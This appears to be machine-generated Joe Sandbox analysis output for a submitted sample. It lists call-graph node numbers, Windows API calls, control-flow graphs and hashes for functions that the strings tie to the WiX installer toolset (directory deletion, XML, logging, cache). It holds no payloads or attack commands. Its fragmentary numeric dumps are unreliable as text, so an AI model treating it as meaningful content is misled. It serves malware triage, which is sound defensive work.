49976->49967 49976->49971 49977->49968 49979 96cbd4 49978->49979 49980 96cbed RegOpenKeyExW 49979->49980 49981 96cbf4 49980->49981 49981->49976 49983 912eaf 52 API calls 49982->49983 49987 971ccc 49983->49987 49984 971d31 49991 971d45 49984->49991 50002 971bf5 72 API calls 49984->50002 49985 971d8a 49996 971d60 49985->49996 50004 91367f GetProcessHeap RtlFreeHeap GetLastError 49985->50004 49986 971e5c 49986->49924 49986->49929 49987->49984 49987->49985 49999 971cd2 49987->49999 49991->49996 50003 971e65 53 API calls 49991->50003 49993 971dd8 49993->49999 50006 9150cb 52 API calls _memcpy_s 49993->50006 49994 971db2 49994->49993 49997 913cfd 52 API calls 49994->49997 49994->49999 49996->49994 49996->49999 50005 912d5d 52 API calls _memcpy_s 49996->50005 49997->49993 49999->49986 50007 91367f GetProcessHeap RtlFreeHeap GetLastError 49999->50007 50000->49928 50001->49931 50002->49991 50003->49996 50004->49996 50005->49994 50006->49999 50007->49986 50036 915444 50008->50036 50010 92c955 50011 92c997 50010->50011 50014 92c95b 50010->50014 50086 91417b 60 API calls 50010->50086 50011->50014 50025 92ca32 50011->50025 50045 976814 50011->50045 50015 92caf0 50014->50015 50096 91367f GetProcessHeap RtlFreeHeap GetLastError 50014->50096 50020 92cafe 50015->50020 50097 91367f GetProcessHeap RtlFreeHeap GetLastError 50015->50097 50016 92ca75 50057 976323 50016->50057 50017 92ca99 50018 912eaf 52 API calls 50017->50018 50018->50014 50020->49941 50026 975cb8 UuidCreate 50020->50026 50025->50014 50025->50016 50025->50017 50027 975cfb StringFromGUID2 50026->50027 50029 975ce8 50026->50029 50027->50029 50028 9567e6 _ValidateLocalCookies 5 API calls 50030 92cba8 50028->50030 50029->50028 50030->49941 50031 972127 50030->50031 50032 972133 50031->50032 50034 972137 50032->50034 50153 971fe9 73 API calls 50032->50153 50034->49941 50035->49940 50037 915463 50036->50037 50038 915528 50037->50038 50039 9154bb 50037->50039 50044 915469 50037->50044 50100 91540b GetProcessHeap RtlAllocateHeap 50038->50100 50098 91593a GetProcessHeap HeapSize 50039->50098 50042 9154ca 50042->50044 50099 9156c2 GetProcessHeap RtlReAllocateHeap 50042->50099 50044->50010 50046 9765ae 54 API calls 50045->50046 50047 97682d 50046->50047 50048 976836 50047->50048 50049 976859 50047->50049 50101 96cffa 50047->50101 50048->50049 50054 9768c1 RegCloseKey 50048->50054 50051 9768e9 50049->50051 50052 9768d8 50049->50052 50056 92c9fa 50049->50056 50053 912eaf 52 API calls 50051->50053 50052->50056 50107 91367f GetProcessHeap RtlFreeHeap GetLastError 50052->50107 50053->50056 50054->50049 50056->50014 50056->50025 50087 975f3a 50056->50087 50058 911839 68 API calls 50057->50058 50059 976348 50058->50059 50060 97636c GetProcAddress 50059->50060 50081 97634e 50059->50081 50061 9763ea 50060->50061 50062 97638a GetCurrentProcess 50060->50062 50063 96cba8 RegOpenKeyExW 50061->50063 50061->50081 50144 96beb7 13 API calls 50062->50144 50069 976429 50063->50069 50065 97639a 50065->50061 50065->50081 50145 97234b 77 API calls 50065->50145 50066 97658c RegCloseKey 50067 976599 50066->50067 50068 9765a7 50067->50068 50151 91367f GetProcessHeap RtlFreeHeap GetLastError 50067->50151 50068->50014 50069->50081 50085 9764ff 50069->50085 50132 976232 50069->50132 50072 9763c5 50072->50081 50146 915573 6 API calls 50072->50146 50077 976531 50077->50081 50150 915573 6 API calls 50077->50150 50078 9764a0 50078->50081 50082 976232 59 API calls 50078->50082 50081->50066 50081->50067 50083 9764d8 50082->50083 50083->50081 50083->50085 50148 915573 6 API calls 50083->50148 50085->50081 50149 97234b 77 API calls 50085->50149 50086->50011 50088 975f85 50087->50088 50089 975f4e 50087->50089 50091 9129c8 52 API calls 50088->50091 50090 9137f3 2 API calls 50089->50090 50093 975f59 50090->50093 50091->50093 50092 975fbc GetLastError 50092->50093 50093->50092 50094 9129c8 52 API calls 50093->50094 50095 975f5f 50093->50095 50094->50093 50095->50025 50096->50015 50097->50020 50098->50042 50099->50044 50100->50044 50102 96d020 50101->50102 50103 96d011 50101->50103 50106 96d026 50102->50106 50108 96d0cb 50102->50108 50103->50102 50123 91593a GetProcessHeap HeapSize 50103->50123 50106->50048 50107->50056 50124 96c287 50108->50124 50110 96d252 50110->50106 50114 96d0f5 50115 96d1d9 50114->50115 50118 96c287 RegQueryValueExW 50114->50118 50120 96d110 50114->50120 50128 9156c2 GetProcessHeap RtlReAllocateHeap 50114->50128 50129 91540b GetProcessHeap RtlAllocateHeap 50114->50129 50115->50120 50130 915a09 56 API calls 50115->50130 50117 96d1f9 50119 96d21e lstrlenW 50117->50119 50117->50120 50118->50114 50119->50110 50121 96d23e 50119->50121 50120->50110 50131 91367f GetProcessHeap RtlFreeHeap GetLastError 50120->50131 50122 9155c9 3 API calls 50121->50122 50122->50120 50123->50102 50125 96c2d8 RegQueryValueExW 50124->50125 50127 96c2a2 50124->50127 50125->50127 50127->50114 50128->50114 50129->50114 50130->50117 50131->50110 50133 96cffa 58 API calls 50132->50133 50134 976254 50133->50134 50135 9762bf 50134->50135 50136 97629a 50134->50136 50143 976277 50134->50143 50138 912eaf 52 API calls 50135->50138 50137 975f3a 53 API calls 50136->50137 50141 9762a5 50137->50141 50138->50141 50139 97631b 50139->50078 50139->50081 50147 915573 6 API calls 50139->50147 50142 913cfd 52 API calls 50141->50142 50141->50143 50142->50143 50143->50139 50152 91367f GetProcessHeap RtlFreeHeap GetLastError 50143->50152 50144->50065 50145->50072 50146->50061 50147->50078 50148->50085 50149->50077 50150->50081 50151->50068 50152->50139 50153->50034 50842 92757c 62 API calls 50844 919360 54 API calls _ValidateLocalCookies 50845 919960 53 API calls 50224 97c16b 16 API calls ___delayLoadHelper2@8 50849 91696f 189 API calls

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00915C81 Relevance: 65.2, APIs: 19, Strings: 18, Instructions: 479fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 194 915c81-915cf2 call 957460 * 2 GetFileAttributesW 199 915d61-915d63 194->199 200 915cf4-915cfe GetLastError 194->200 201 916275-916296 call 911225 199->201 202 915d69-915d6b 199->202 203 915d00-915d09 200->203 204 915d0b 200->204 223 91629b-9162a1 call 911228 201->223 205 915dda-915de1 202->205 206 915d6d-915d7b SetFileAttributesW 202->206 203->204 207 915d14-915d1b 204->207 208 915d0d-915d12 204->208 210 915de3-915de7 205->210 211 915ded-915df1 205->211 206->205 212 915d7d-915d87 GetLastError 206->212 214 915d25 207->214 215 915d1d-915d23 207->215 213 915d2b-915d47 call 911225 208->213 210->211 217 91615c-916167 RemoveDirectoryW 210->217 218 915df3-915e05 call 914dd8 211->218 219 915e28-915e3e call 913db5 211->219 220 915d94 212->220 221 915d89-915d92 212->221 244 915d4c-915d55 call 911228 213->244 222 915d27-915d29 214->222 215->214 215->222 226 9162a4-9162ad 217->226 227 91616d-916177 GetLastError 217->227 218->219 245 915e07-915e23 call 911228 218->245 249 915e40-915e50 219->249 250 915e5a-915e76 FindFirstFileW 219->250 228 915d96-915d9b 220->228 229 915d9d-915da4 220->229 221->220 222->213 232 915d5a-915d5c 222->232 223->226 234 9162b6-9162bd 226->234 243 9162af-9162b0 FindClose 226->243 236 916182-916188 227->236 237 916179-91617c 227->237 238 915db4-915dd5 call 911225 228->238 239 915da6-915dac 229->239 240 915dae 229->240 232->234 252 9162ca-9162d1 234->252 253 9162bf-9162c5 call 91367f 234->253 246 9161a1-9161a8 236->246 247 91618a-91618e 236->247 237->236 238->244 239->240 248 915db0-915db2 239->248 240->248 243->234 244->234 245->234 262 9161f6-9161f8 246->262 263 9161aa-9161b0 246->263 260 916190-91619d MoveFileExW 247->260 261 9161d5-9161f1 call 911225 247->261 248->232 248->238 249->250 264 915e78-915e82 GetLastError 250->264 265 915ebc-915ec6 250->265 257 9162d3-9162d9 call 91367f 252->257 258 9162de-9162e5 252->258 253->252 257->258 274 9162f2-916302 call 9567e6 258->274 275 9162e7-9162ed call 91367f 258->275 260->261 271 91619f 260->271 261->223 262->226 263->262 272 9161b2-9161b8 263->272 267 915e84-915e8d 264->267 268 915e8f 264->268 269 915ec8-915ed1 265->269 270 915eed-915f17 call 912476 265->270 267->268 280 915e91 268->280 281 915e96-915eb2 call 911225 268->281 285 9160b7-9160c7 FindNextFileW 269->285 286 915ed7-915ede 269->286 297 91625b-916265 270->297 298 915f1d-915f35 call 913db5 270->298 271->246 278 9161ba-9161c1 272->278 279 9161cd-9161cf 272->279 275->274 278->261 291 9161c3-9161c7 278->291 279->226 279->261 280->281 281->265 293 91614d-916156 GetLastError 285->293 294 9160cd-9160d3 285->294 286->270 289 915ee0-915ee7 286->289 289->270 289->285 291->226 291->279 293->217 296 9161fd-916207 GetLastError 293->296 294->265 301 916214 296->301 302 916209-916212 296->302 299 91626a-916273 call 911228 297->299 308 916239-916259 call 911228 298->308 309 915f3b-915f3f 298->309 299->226 305 916216 301->305 306 91621b-916237 call 911225 301->306 302->301 305->306 306->223 308->226 312 915f41-915f48 309->312 313 915fa4-915fab 309->313 312->313 316 915f4a-915f5a call 913cfd 312->316 317 9160b1 313->317 318 915fb1-915fb8 313->318 327 915f60-915f69 call 915c81 316->327 328 9160d8-9160ed 316->328 317->285 320 91600b-916019 DeleteFileW 318->320 321 915fba-915fcd SetFileAttributesW 318->321 320->317 323 91601f-916023 320->323 321->320 322 915fcf-915fd9 GetLastError 321->322 325 915fe6 322->325 326 915fdb-915fe4 322->326 329 916025-916042 call 914b8a 323->329 330 91607a-916084 GetLastError 323->330 331 9160f2 325->331 332 915fec-915ff2 325->332 326->325 341 915f6e-915f70 327->341 328->223 346 916048-916062 MoveFileExW 329->346 347 91611a-916129 329->347 334 916091 330->334 335 916086-91608f 330->335 343 9160f7-91610a call 911225 331->343 337 915ff4-915ffa 332->337 338 915ffc 332->338 339 916097-91609d 334->339 340 91612e 334->340 335->334 337->338 345 915ffe-916000 337->345 338->345 348 9160a7 339->348 349 91609f-9160a5 339->349 344 916133-91614b call 911225 340->344 341->317 350 915f76-915f7b 341->350 359 91610f-916115 343->359 344->359 345->343 354 916006 345->354 356 916072-916078 346->356 357 916064 346->357 347->299 353 9160a9-9160ab 348->353 349->348 349->353 350->317 355 915f81-915f9f call 911228 350->355 353->317 353->344 354->317 355->317 361 91606a-916070 MoveFileExW 356->361 357->361 359->223 361->317
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 00915CE9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915CF4
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,00000001), ref: 00915D73
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915D7D
                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,?,00000000,00000001), ref: 00915E67
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915E78
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 00915FC5
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 00915FCF
                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?,00000000), ref: 00916011
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000001,?,DEL,00000000,?,?,?,?,?,00000000,00000001), ref: 00916056
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 0091606A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0091607A
                                                                                                                                                                  • FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,00000105,?,00000104,00000000,00000000,00000A00,?,?,?,?), ref: 009160BF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0091614D
                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 0091615F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0091616D
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,00000000,00000001), ref: 00916195
                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp,00000149,8000FFFF,?,?,?,?,00000000,00000001), ref: 009162B0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLast$AttributesFindMove$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                  • String ID: *.*$DEL$Directory delete cannot delete file: %ls$Failed to concat filename '%ls' to directory: %ls$Failed to concat wild cards to string: %ls$Failed to delete file: %ls$Failed to delete subdirectory; continuing: %ls$Failed to ensure file name was null terminated.$Failed to ensure path is backslash terminated: %ls$Failed to get attributes for path: %ls$Failed to get temp directory.$Failed to get temp file to move to.$Failed to remove attributes from file: %ls$Failed to remove directory: %ls$Failed to remove read-only attribute from path: %ls$Failed while looping through files in directory: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to get first file in directory: %ls
                                                                                                                                                                  • API String ID: 3695804116-305978383
                                                                                                                                                                  • Opcode ID: a8066258588b4021e10ead0d9d442eb3c06fff9169a8c67636a7d59f897131ef
                                                                                                                                                                  • Instruction ID: f3851c658f6959abe0f9cc51bfef8d94a2f5dbb7a9d8a8754396fc30a8feeb71
                                                                                                                                                                  • Opcode Fuzzy Hash: a8066258588b4021e10ead0d9d442eb3c06fff9169a8c67636a7d59f897131ef
                                                                                                                                                                  • Instruction Fuzzy Hash: B9F14872F8063CB6EB3166148C0AFEE656C9B85B10F024585FF18BA1D1E7B48DC08BA5
                                                                                                                                                                  Function 0096FE01 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 198libraryloadercomCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 1056 96fe01-96fe29 GetModuleHandleA 1057 96fea6-96feb4 GetProcAddress 1056->1057 1058 96fe2b-96fe35 GetLastError 1056->1058 1059 96ff16-96ff35 CoCreateInstance 1057->1059 1060 96feb6-96fee6 GetProcAddress * 3 1057->1060 1061 96fe37-96fe40 1058->1061 1062 96fe42 1058->1062 1063 96ff37-96ff41 1059->1063 1064 96ff58-96ff5a 1059->1064 1067 96ff12 1060->1067 1068 96fee8-96feea 1060->1068 1061->1062 1065 96fe44 1062->1065 1066 96fe49-96fe6c call 911225 call 911228 1062->1066 1069 96ff46-96ff53 call 911228 1063->1069 1072 96ff5f-96ff6f 1064->1072 1065->1066 1088 96fe6f-96fe74 1066->1088 1067->1059 1068->1067 1071 96feec-96feee 1068->1071 1082 970013-970017 1069->1082 1071->1067 1075 96fef0-96ff10 1071->1075 1076 96ff71-96ff75 1072->1076 1077 96ff79 1072->1077 1075->1059 1076->1072 1080 96ff77 1076->1080 1081 96ff7b-96ff8b 1077->1081 1085 96ff93 1080->1085 1086 96ff8d-96ff91 1081->1086 1087 96ff99-96ff9d 1081->1087 1082->1088 1089 97001d-97002c 1082->1089 1085->1087 1086->1081 1086->1085 1090 96fff7-970008 1087->1090 1091 96ff9f-96ffb2 call 97003b 1087->1091 1092 96fe86-96fe8b 1088->1092 1093 96fe76-96fe84 1088->1093 1089->1088 1109 970032-970034 ExitProcess 1089->1109 1090->1082 1094 97000a-970011 1090->1094 1101 96ffb4-96ffc3 1091->1101 1102 96ffc5-96ffe1 1091->1102 1097 96fe9d-96fea3 1092->1097 1098 96fe8d-96fe9b 1092->1098 1093->1092 1094->1082 1098->1097 1101->1069 1102->1090 1111 96ffe3-96fff2 1102->1111 1111->1069
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00917DDB,?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?), ref: 0096FE1F
                                                                                                                                                                  • GetLastError.KERNEL32(?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B,?,?,?,?,?), ref: 0096FE2B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0096FEAC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0096FEBC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 0096FECB
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0096FED9
                                                                                                                                                                  • CoCreateInstance.OLE32(009AD6D8,00000000,00000001,0097E8F8,00917D5B,?,00970662,00000000,00917D5B,00000000,?,?,009340B9,?,?,00917D5B), ref: 0096FF2B
                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00970034
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed XmlCreateElement$failed appendChild$failed to create XML DOM Document$failed to get handle to kernel32.dll$kernel32.dll
                                                                                                                                                                  • API String ID: 2124981135-1573969316
                                                                                                                                                                  • Opcode ID: 981b191da52933b94badefa513b0f9a341a0327f8127590ccc9c98294afbffea
                                                                                                                                                                  • Instruction ID: b817e40538e88cca0e81a431a625a6ff7eca38262045c6e42caae2b969d1f0bf
                                                                                                                                                                  • Opcode Fuzzy Hash: 981b191da52933b94badefa513b0f9a341a0327f8127590ccc9c98294afbffea
                                                                                                                                                                  • Instruction Fuzzy Hash: 48610732B00315ABDB159B64DC19FAE7BB8EF8A700F1140A9F509EB291EB708D40DB80
                                                                                                                                                                  Function 0096A805 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 168threadtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,--- logging level: %hs ---,009A1670,00000000,?,00917B05,00000003), ref: 0096A833
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,00917B05,00000003), ref: 0096A843
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0096A84C
                                                                                                                                                                  • GetLocalTime.KERNEL32(00917B05,?,00917B05,00000003), ref: 0096A862
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(009AD4F0,?,?,?,00000000,0000FDE9,?,00917B05,00000003), ref: 0096A9CB
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp, xrefs: 0096A923, 0096A9B9
                                                                                                                                                                  • Failed to write string to log using redirected function: %ls, xrefs: 0096A98A
                                                                                                                                                                  • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0096A8FF
                                                                                                                                                                  • Failed to convert log string to UTF-8, xrefs: 0096A955
                                                                                                                                                                  • Failed to write string to log using default function: %ls, xrefs: 0096A9AA
                                                                                                                                                                  • Failed to format line prefix., xrefs: 0096A914
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                  • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$Failed to convert log string to UTF-8$Failed to format line prefix.$Failed to write string to log using default function: %ls$Failed to write string to log using redirected function: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                                  • API String ID: 296830338-1339504754
                                                                                                                                                                  • Opcode ID: 55124e8437056d0f8dc2531e6d358a12d019c5c68bf1e96f9fd3b9ba66ea3e85
                                                                                                                                                                  • Instruction ID: ddafe9fc03dfdfd574d63ed00c952f2b02bb95f18447d9d475984550a76b9ede
                                                                                                                                                                  • Opcode Fuzzy Hash: 55124e8437056d0f8dc2531e6d358a12d019c5c68bf1e96f9fd3b9ba66ea3e85
                                                                                                                                                                  • Instruction Fuzzy Hash: 3751C372F01219BBDB219BA4CC06BBF76B8AF49B54F114011FA01BB291D6749D80DBE2
                                                                                                                                                                  Function 0096A747 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000002,00000000,00000000,00000000,?,?,0096B0B3,009350E1,?,?,00000000,00000001), ref: 0096A766
                                                                                                                                                                  • GetLastError.KERNEL32(?,0096B0B3,009350E1,?,?,00000000,00000001,?,0091812D,009350E1,?,00000000,?,?,009350E1,00000002), ref: 0096A772
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,009350E1,?,00000002,?,?,0096B0B3,009350E1,?,?,00000000,00000001,?,0091812D,009350E1,?), ref: 0096A7F8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to log id: %d
                                                                                                                                                                  • API String ID: 1365068426-1219654922
                                                                                                                                                                  • Opcode ID: 0f1e694631c5a9298872c2b946947909920d9fa61a92874fba421d158f2b5ed6
                                                                                                                                                                  • Instruction ID: 0b7c332849adf4d6f5cffd70ca2b22781fed453824885c7b718d68bd23e63882
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f1e694631c5a9298872c2b946947909920d9fa61a92874fba421d158f2b5ed6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F21D276A00129BFDB21AF80DC46FEF3A7DEF88750F014019FD01A6161D7308E51EAA1
                                                                                                                                                                  Function 0092ED3B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DecryptFileW.ADVAPI32(?,00000000), ref: 0092EDF1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DecryptFile
                                                                                                                                                                  • String ID: Failed to copy working folder.$No usable base working folder found.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 3257575229-4136860833
                                                                                                                                                                  • Opcode ID: ae85a1988cfad89abd9b24a3d094a714718a9a27646afff3b97b606c8ea1ddec
                                                                                                                                                                  • Instruction ID: 27c912c352f0e17be92d8f48e6b17e9be8354170f3e851b575b04430fd7ec6f4
                                                                                                                                                                  • Opcode Fuzzy Hash: ae85a1988cfad89abd9b24a3d094a714718a9a27646afff3b97b606c8ea1ddec
                                                                                                                                                                  • Instruction Fuzzy Hash: E5312B31B40629FFEB22AB64DC85FEEB668FF44714F118124F504AA1D0D7B06E50DBA0
                                                                                                                                                                  Function 0091540B Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
